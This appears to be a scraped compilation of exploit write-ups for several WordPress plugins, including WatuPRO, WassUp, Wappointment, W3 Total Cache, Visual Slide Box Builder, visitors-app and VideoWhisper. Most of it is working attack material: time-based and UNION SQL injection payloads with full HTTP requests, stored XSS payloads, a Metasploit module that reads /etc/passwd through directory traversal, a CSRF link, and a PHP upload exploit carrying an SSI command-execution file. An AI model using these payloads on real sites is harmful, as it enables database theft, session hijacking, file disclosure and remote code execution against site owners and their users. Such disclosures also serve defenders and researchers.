precise results and low false positive rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security Testing, BlackBox Testing)
solution for comprehensive security audits of active web applications. WebScanner will test a
website's security by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.

Subscribe for free software trial on our website http://www.defensecode.com
E-mail: defensecode[at]defensecode.com
Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/
HireHackking 
#####################################
Exploit Title: SQL Injection In WatuPRO (WordPress Plugin to Create Exams, Tests and Quizzes)
Exploit Author: Manich  Koomsusi
Date: 03-07-2017
Software: WatuPRO
Version: 5.5.1
Website: http://calendarscripts.info/watupro/
Tested on: WordPress 4.7.5
Software Link: https://1drv.ms/u/s!AhfkvGaDTn1bmgHSj9u_jQX8iME0
CVE: CVE-2017-9834
#####################################

Description
==================================
SQL Injection in WatuPRO WordPress Plugin for create exams, Tests and Quizzes allow the attacker dump the database contents.

Vulnerability
==================================
This plugin sending quizzes to the server with “watupro_questions” parameter not sanitize before take SQL statement.

Proof of concept
==================================
Take exams or quizzes and submit to the server in POST method

Payload : “1:1,2) AND 4761=IF((41=41),SLEEP(5),4761) AND (4547=4547”    the server delay response time around ~5 second.
Payload : “1:1,2) AND 4761=IF((41=41),SLEEP(0),4761) AND (4547=4547”    the server not delay response time.

############
POST /pt/wordpress/wp-admin/admin-ajax.php HTTP/1.1
Content-Length: 292
Accept-Language: en-US,en;q=0.5
Host: 192.168.5.189
Accept: text/plain, */*; q=0.01
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
DNT: 1
Connection: close
X-Requested-With: XMLHttpRequest
Referer: http://192.168.5.189/pt/wordpress/
Cookie: wordpress_155e4542aeb2c66021dab6903e684bdb=admin%7C1497811093%7CaY85tN6gH7x8iYCzPETIcEJYYyn6tZlzJnbhTZLgZYX%7C475cf68a551a0db99cd991e958fc949bfe8f2a833bf39d0534ce25d29c11a9b8; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_155e4542aeb2c66021dab6903e684bdb=admin%7C1497811093%7CaY85tN6gH7x8iYCzPETIcEJYYyn6tZlzJnbhTZLgZYX%7C61ef1ea8c998118da9dd01d5f650dc0806f8bfbb1d5f28fdbb626f062bcebbcd; wp-settings-time-1=1497748191; PHPSESSID=rh7v9qt9ibdlioth3cecr5gg94
Content-Type: application/x-www-form-urlencoded
action=watupro_submit&quiz_id=1&question_id%5B%5D=1&watupro_questions=1:1,2)%20AND%204761%3dIF((41%3d41),SLEEP(5),4761)%20AND%20(4547%3d4547&post_id=5&answer-1%5B%5D=1&question_1_hints=&taker_email=hacker%40admin.com<http://40admin.com>&h_app_id=0.24749700+1497748201&start_time=2017-06-18+01%3A10%3A01&in_ajax=1
#############


Mitigations
==================================
Upgrade to version 5.5.3.7 or later.

Timeline
==================================
2017-06-19: Discovered the bug
2017-06-19: Reported to vendor
2017-06-19: First response from vendor saying software it fixed. But the vendor fix not properly
2017-06-20: Version 5.5.3.7 released “Fixed issue with input validate.”
2017-07-03: Advisory published

Discovered By:
=====================
Manich  Koomsusi
HireHackking 
Source: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_wassup_real_time_analytics_wordpress_plugin.html

Persistent Cross-Site Scripting in WassUp Real Time Analytics WordPress Plugin

Abstract

A stored Cross-Site Scripting (XSS) vulnerability has been found in the WassUp Real Time Analytics WordPress Plugin. By using this vulnerability an attacker can inject malicious JavaScript code into the application, which will execute within the browser of any user who views the Activity Log, in general WP admin.

Contact

For feedback or questions about this advisory mail us at sumofpwn at securify.nl

The Summer of Pwnage

This issue has been found during the Summer of Pwnage hacker event, running from July 1-29. A community summer event in which a large group of security bughunters (worldwide) collaborate in a month of security research on Open Source Software (WordPress this time). For fun. The event is hosted by Securify in Amsterdam.

OVE ID

OVE-20160717-0002

Tested versions

This issue was successfully tested on WassUp Real Time Analytics version 1.9.

Fix

This issue has been fixed in version 1.9.1.

Introduction

The WassUp Real Time Analytics WordPress plugin can be used to analyze visitors' traffic with real-time statistics.

Details

A stored Cross-Site Scripting vulnerability was found in the Wassup WordPress plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. Particularly interesting about this issue is that an anonymous user can simply store his XSS payload in the Admin dashboard by just visiting the public site with a malformed link.

The malicious script code can be sent by anyone visiting the website (unauthenticated). The malicious code is then executed in the admin panel under section 'Current Visitors' of the Wassup plugin page.

The issue exists in the file wassup.php and is caused by the lack of output encoding on the request-uri parameter. The vulnerable code is listed below.

</span><span class="request-uri"><?php echo wassupURI::url_link

and in the file wassup.class.php:

else $urllink='<a href="'.self::add_siteurl("$urlrequested").'" target="_BLANK">'.stringShortener("$urlrequested",$chars).'</a>';
return $urllink;

Proof of concept

1. Log in as admin and empty the log data of Wassup for a clean test -> http://<targetsite>/wp-admin/admin.php?page=wassup-options -> Manage Files and Data -> Empty table

2. Open Burp Suite and sent the following requests one after another:

GET /test HTTP/1.1
Host: <targetsite>

GET ///--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(70,70,70))</SCRIPT> HTTP/1.1
Host: <targetsite>

3. Open the Current Visitors Online page as an admin: http://<targetsite>/wp-admin/admin.php?page=wassup-online

Note: Your request should be detected as a Spider/Bot by the Wassup plugin. One way to do this is by sending the requests above through Burp Suite.
HireHackking 
# Exploit Title: WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS)
# Date: 2021-07-31
# Exploit Author: Renos Nikolaou
# Software Link: https://downloads.wordpress.org/plugin/wappointment.2.2.4.zip
# Version: 2.2.4
# Tested on: Windows
# Description : Wappointment is prone to Stored Cross Site Scripting vulnerabilities 
# because it fails to properly sanitize user-supplied input.

# PoC - Stored XSS - Parameter: name
# 1) Open Wappointment Plugin or Visit booking-page http://localhost/booking-page
# 2) Click on any available delivery modality (By Phone, At a Location, Video Meeting or By Skype)
# 3) Select Date and Time, write your email address, your phone number and in the Full Name field type: testname"><img src=x onerror=prompt(1)>
# 4) Click Confirm
# 5) Login as admin to wp-admin portal, Go to Wappointment --> Calendar ( http://localhost/wordpress/wp-admin/admin.php?page=wappointment_calendar )


# Post Request (Step 4):

POST /wordpress/wp-json/wappointment/v1/services/booking HTTP/1.1
Host: domain.com
Content-Length: 205
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Type: application/json
Origin: http://domain.com
Referer: http://domain.com/wordpress/booking-page/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"email":"testemail@testemail.com","name":"testname\"><img src=x onerror=prompt(1)>","phone":"+00 00 000000","time":1630666800,"ctz":"Europe/Bucharest","service":1,"location":3,"duration":90,"staff_id":2}
HireHackking 
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#
##

class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Auxiliary::Scanner

def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress W3 Total Cache File Read Vulnerability',
'Description' => %q{
This module exploits an unauthenticated directory traversal vulnerability
in WordPress plugin
'W3 Total Cache' version 0.9.2.6-0.9.3, allowing arbitrary file read with
the web server privileges.
},
'References' =>
[
['CVE', '2019-6715'],
['WPVDB', '9248'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-6715'],
['URL','https://vinhjaxt.github.io/2019/03/cve-2019-6715'],
],
'Author' =>
[
'VinhJAXT', # Vulnerability discovery
'Hoa Nguyen - SunCSR Team' # Metasploit module
],
'DisclosureDate' => '2014-09-20',
'License' => MSF_LICENSE
)
)

register_options(
[
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 2])
]
)
end

def check
check_plugin_version_from_readme('w3-total-cache', '0.9.4', '0.9.26')
end

def run_host(ip)
traversal = '../' * datastore['DEPTH']
filename = datastore['FILEPATH']
filename = filename[1, filename.length] if filename =~ %r{^/}

json_body = { 'Type' => "SubscriptionConfirmation",
'Message' => '',
'SubscribeURL' => "file:///#{traversal}#{filename}"
}

res = send_request_cgi({
'method' => 'PUT',
'uri' => normalize_uri(wordpress_url_plugins, 'w3-total-cache', 'pub','sns.php'),
'ctype' => 'application/json',
'data' => JSON.generate(json_body)
})

fail_with Failure::Unreachable, 'Connection failed' unless res
fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' unless res.code == 200
fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?

print_status('Downloading file...')
print_line("\n#{res.body}\n")

fname = datastore['FILEPATH']
path = store_loot(
'w3_total_cache.traversal',
'text/plain',
ip,
res.body,
fname
)
print_good("File saved in: #{path}")
end
end
HireHackking 
source: https://www.securityfocus.com/bid/69745/info

W3 Total Cache plugin for WordPress is prone to a cross-site request-forgery vulnerability.

An attacker can exploit the cross-site request forgery issue to perform unauthorized actions in the context of a logged-in user of the affected application. This may aid in other attacks.

W3 Total Cache 0.9.4 is vulnerable; other versions may also be affected. 

http://www.example.com/wordpress/wp-admin/admin.php?page=w3tc_general&w3tc_note=enabled_edge
HireHackking 
# Title: WordPress Plugin Visual Slide Box Builder 3.2.9 - SQLi
# Author: nu11secur1ty
# Date: 07.11.2022
# Vendor: https://wphive.com/
# Software: https://wphive.com/plugins/wp-visual-slidebox-builder/?plugin_version=3.2.9
# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Visual-Slide-Box-Builder-plugin

## Description:
The parameter `idx` from the Visual Slide Box Builder plugin app for
WordPress appears to be vulnerable to SQLi.
The attacker can receive all database information from the WordPress
database and he can use it for very malicious purposes.

[+] Payloads:

```mysql
---
Parameter: idx (GET)
    Type: boolean-based blind
    Title: HAVING boolean-based blind - WHERE, GROUP BY clause
    Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)
HAVING 1854=1854

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=vsbb_get_one&idx=1 union select 1,2,3,4,5,sleep(3)
AND (SELECT 3837 FROM (SELECT(SLEEP(7)))QHbL)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: action=vsbb_get_one&idx=-5038 UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x716a626a71,0x4e6b417358754d527a4a69544c57654a53574a64736b5a656e4b7968767a7a4d454243797a796d72,0x717a7a7a71),NULL,NULL#
---
```
HireHackking 
# Exploit Title: WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)
# Date: 09/06/2021
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://profiles.wordpress.org/domingoruiz/
# Software Link: https://wordpress.org/plugins/visitors-app/
# Version: 0.3 
# Tested on: Debian GNU/Linux 10
# Reference: https://wpscan.com/vulnerability/06f1889d-8e2f-481a-b91b-3a8008e00ffc

## Description:
# A vulnerability in the Wordpress plugin "visitors" version 0.3 and prior allows remote attacker through 
# Cross-Site Scripting (XSS) to redirect administrators and visitors and potentially obtain sensitive informations
# The 'user-agent' parameter allows attacker to escalate their privileges.

## PoC
# Replace google.com with malicious attacker page
curl -i http://localhost/wordpress --user-agent "</script><script>location=([]+/http:\\google.com/g).substr(1,19); </script>"

# on http://localhost/wordpress/wp-admin, browse the tab "visitors"
HireHackking 
Title: Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site: https://wordpress.org/plugins/videowhisper-video-presentation/
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31 won’t fix, http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
Vendor Contact: http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=117
Description: from the site 
"VideoWhisper Video Consultation is a web based video communication solution designed for online video consultations, interactive live presentations, trainings, webinars, coaching and online collaboration with webcam support. Read more on WordPress Video Presentation plugin home page."

Vulnerability:
From wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php Allows various remote unauthenticated file uploads, among the file types is html where the last 4 characters are only being checked in a file name to match which types are allowed. Because of this .shtml can be passed through and remote code execution if SSI is allowed. The code does not do any user access validation and therefore anyone can upload the following files to an unsuspecting wordpress site: .shtml,swf,.zip,.rar,.jpg,jpeg,.png,.gif,.txt,.doc,docx,.htm,html,.pdf,.mp3,.flv,.avi,.mpg,.ppt,.pps 
The 
if (strstr($filename,'.php')) exit; 

can be by passed by using the extension .Php but the file extension check would allow files like test.Php.shtml
<?php 
if ($_GET["room"]) $room=$_GET["room"]; 
if ($_POST["room"]) $room=$_POST["room"]; 
$filename=$_FILES['vw_file']['name']; 
include_once("incsan.php"); 
sanV($room); 
if (!$room) exit; 
sanV($filename);
if (!$filename) exit; 
if (strstr($filename,'.php')) exit; //do not allow uploads to other folders
if ( strstr($room,"/") || strstr($room,"..") ) exit; 
if ( strstr($filename,"/") || strstr($filename,"..") ) exit; 
$destination="uploads/".$room."/“; 
if ($_GET["slides"]) $destination .= "slides/“; 
$ext=strtolower(substr($filename,-4)); $allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps”);
if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename); 
?>loadstatus=1
CVEID: TBD
OSVDB: TBD
Exploit Code:
  videowhis_poc.php 
        <?php
    
   $uploadfile="upexp.shtml";
   $ch = 
   curl_init("http://target_site/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php");
   curl_setopt($ch, CURLOPT_POST, true);
   curl_setopt($ch, CURLOPT_POSTFIELDS,
            array('vw_file'=>"@$uploadfile",'name'=>'upexp.shtml','room'=>'.'));
   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   $postResult = curl_exec($ch);
   curl_close($ch);
   print "$postResult";
    
   ?>
    
    
   upexp.shtml
    
   <html>
    
   <!--#exec cmd="/usr/bin/date > /tmp/p" -->
    
   this is html
   </html>
    
    
   The executeable should be located in wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads